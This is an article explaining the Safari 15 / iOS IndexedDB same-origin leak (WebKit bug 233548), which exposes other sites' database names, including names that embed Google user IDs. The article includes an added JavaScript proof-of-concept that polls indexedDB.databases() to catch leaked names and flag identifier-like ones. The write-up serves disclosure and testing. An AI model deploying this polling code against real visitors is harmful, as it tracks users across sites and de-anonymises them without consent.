Safari 15's implementation of the IndexedDB API contains a data leak that allows websites to track the user's activity on other sites and, in some cases, disclose their identity. FingerprintJS reported this bug to the WebKit Bug Tracker on November 28, 2021, where it is tracked as bug 233548. Apple's engineers were working on the fix as of January 16, 2022 and marked it as resolved on January 17. However, the fix had not shipped in a release as of January 19, leaving Safari 15 and all browsers on iOS and iPadOS vulnerable for the time being.
Web applications use IndexedDB to store significant amounts of structured data on the client side. All major browsers support it, making IndexedDB a commonly used API. The API is low-level and callback-heavy, so developers often wrap it in a library that abstracts its functions and makes it easier to use.
Like the other storage mechanisms of the web platform, IndexedDB is subject to the same-origin policy. This policy restricts the ways in which documents and scripts loaded from one origin can interact with resources from other origins; in particular, a script must never be able to see or interact with databases belonging to another origin. An origin in this context is the combination of scheme, host and port used to access the page, and each indexed database is bound to the origin that created it.
Description
The IndexedDB implementation in Safari 15 on macOS, and in every browser on iOS and iPadOS (all of which are built on the same WebKit engine), violates the same-origin policy. Each time a website interacts with a database, an empty database with the same name, known as a cross-origin duplicated database, is created in all other active frames, tabs and windows within the same browser session. Tabs and windows normally share the same session, unless the user switches to a different profile or opens a private window, which uses a separate session.
Leaking database names across origins is an obvious privacy violation: it lets a website learn which other sites the user is visiting, even in different windows or tabs, because database names tend to be unique and website-specific. Worse, some sites embed user identifiers in those names. Google Calendar, Google, Google Keep and YouTube use database names that contain the authenticated user's Google User ID, so a malicious site can uniquely identify a logged-in user. When the user is logged into several accounts, these sites may create a separate database for each account, and each of those names leaks as well.
Implications
The most serious implication of bug 233548 is that a malicious actor can identify the user and link multiple accounts belonging to the same person, without any action on the user's part. All the attacker needs is a tab or window that continually queries IndexedDB for the list of available databases (the standard indexedDB.databases() call); the names that appear reveal, in real time, which other sites the user is visiting. An attacker can also provoke a leak deliberately by opening a target website in a popup window or iframe, which makes that site create its databases and thereby expose their names.
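As an added illustration of the polling technique described above (example code written for this article, not code from FingerprintJS, WebKit or Apple), the following JavaScript repeatedly enumerates database names and reports any that the calling origin did not create itself. The name-diffing logic is separated from the browser call so it can also run under Node against a constructed stand-in for an affected session; the database names in that stand-in and the digit-run heuristic for identifier-like names are assumptions made for illustration, not observed values.

```javascript
// Added example, not part of the original write-up or of WebKit.
// indexedDB.databases() resolves to [{name, version}, ...]. On a correct browser
// that list holds only the caller's own databases; on an affected Safari 15 /
// iOS 15 session it also holds the empty cross-origin duplicates created by
// other sites, which is what this observer watches for.

// State for one observer: names this origin created itself, and names
// already reported so each leak is surfaced once.
function createLeakState(ownNames = []) {
  return { own: new Set(ownNames), seen: new Set() };
}

// Given one snapshot from databases(), return names that are not ours and
// not yet reported. Mutates state.seen.
function scanSnapshot(state, infos) {
  const leaked = [];
  for (const { name } of infos) {
    if (state.own.has(name) || state.seen.has(name)) continue;
    state.seen.add(name);
    leaked.push(name);
  }
  return leaked;
}

// Heuristic (assumption, not a modelled format): a long run of digits in a
// database name usually means a per-user identifier was embedded in it.
function looksLikeUserId(name) {
  return /\d{8,}/.test(name);
}

// One probe against idb: the real indexedDB in a browser, or any object with
// a databases() method returning a Promise of {name, version} records.
async function probeOnce(idb, state) {
  const infos = await idb.databases();
  return scanSnapshot(state, infos);
}

// Keep probing every intervalMs; onLeak receives each batch of new names.
// Returns a function that stops the loop. Not started automatically below so
// this file also runs to completion under Node.
function watchForLeakedDatabases(idb, state, onLeak, intervalMs = 1000) {
  const timer = setInterval(async () => {
    try {
      const names = await probeOnce(idb, state);
      if (names.length) onLeak(names);
    } catch (e) {
      // databases() can reject (e.g. storage disabled); keep polling.
    }
  }, intervalMs);
  return () => clearInterval(timer);
}

// Constructed stand-in for an affected session: this page created "tracker",
// and two other origins' database names leaked in. Names are invented.
const fakeAffectedIndexedDB = {
  databases: async () => [
    { name: 'tracker', version: 1 },
    { name: 'shop-cart-cache', version: 3 },
    { name: 'mail-sync:123456789012345', version: 1 },
  ],
};

// In a browser this probes the real indexedDB; under Node it uses the stand-in.
const observer = createLeakState(['tracker']);
const idb = (typeof indexedDB !== 'undefined') ? indexedDB : fakeAffectedIndexedDB;
probeOnce(idb, observer).then((names) => {
  for (const n of names) {
    console.log(looksLikeUserId(n) ? `identifier-like name: ${n}` : `leaked name: ${n}`);
  }
});
```

In a browser you would call watchForLeakedDatabases(indexedDB, observer, console.log) and leave the tab open; a patched browser never reports anything, so the same loop doubles as a quick check for whether a given build is affected. The heuristic only flags names that embed long digit runs; it says nothing about what the identifier is or which site it belongs to.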
Protection
Safari, iPadOS and iOS users can't easily protect themselves from bug 233548 until Apple ships the fix. They can disable JavaScript by default and allow it only on trusted sites, but this is impractical for most users given how heavily modern websites depend on JavaScript, and a cross-site scripting flaw on a trusted site could still be used to run the attack, if with more difficulty. Because a private window uses a separate session, visiting sensitive sites in a private window limits what a malicious tab in the normal session can observe, but it does not close the hole. Safari users on Macs can simply switch to another browser until a fix is available; iOS and iPadOS users don't have this option, because third-party browsers on those systems are required to use the same WebKit engine and are affected as well.
Image: "Solución fallo en Safari búsqueda en iPhone, iPad y Mac" (Fix for Safari search bug on iPhone, iPad and Mac), Flickr photo by iphonedigital, shared under a Creative Commons (BY-SA) license.